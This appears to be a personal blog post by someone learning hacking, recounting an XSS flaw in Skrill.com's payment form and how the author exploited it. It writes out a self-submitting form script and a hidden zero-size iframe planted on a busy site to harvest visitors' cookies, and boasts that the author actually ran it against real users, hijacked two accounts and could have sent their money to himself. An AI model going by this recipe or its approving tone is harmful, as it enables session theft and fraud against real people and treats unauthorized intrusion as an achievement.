I have been studying the wonderful world of hacking in the last months. A book I read, on pen-testing suggested looking at http://www.reddit.com/r/xss for news on xss, new methods, examples etc.
I have never used reddit before, now I am hooked on it. I always thought of XSS a strange problem, didn’t understood how someone can attack your website or really do anything with xss, other than redirect users to another website or so, and to achieve that the XSS would have to be stored in a database or something, and displayed to other users.
Then I realized that XSS is one of the worse holes you can have on your website. One can use an xss attack to steal your cookies and basically be authorized and basically have access where you have access.
So today I saw that: http://www.reddit.com/r/xss/comments/2jea1h/xss_on_payment_form_skrill/
This was a brief skrill.com XSS vulerability. It was active for 24 hours. This guy found a form where input is not filtered. Specifically
So how to exploit (I actually tried this and it worked).
You will have to create a form:
<script> document.forms["myform"].submit(); </script>
And load it to some other (preferably hi-traffic website.
<iframe width="0" height="0" src="http://www.mysite.com/xss.php"></iframe>
Then what happens: Every time someone gets into your website, you get their cookies. Then you visit skrill.com and use their cookies, and you are logged in as them.
I actually tried this. I left it online for 10 hours, in a high traffic website, I got 2 valid cookies, used them and logged in. I could easily sent the money to my account, Now actually being able to do that, is more important to me than actually stealing from the poor guys that I exploited, but it was sure the highlight of my hacking attempts. Its not every day that you can say you hacked skrill.com.
And it was all done with kindergarten-level knowledge in terms of hacking and some luck.
I always though that those wholes don’t exist anymore, especially in large websites. But I was wrong. Developers make mistakes every day.
This was online for a full day before they fixed it.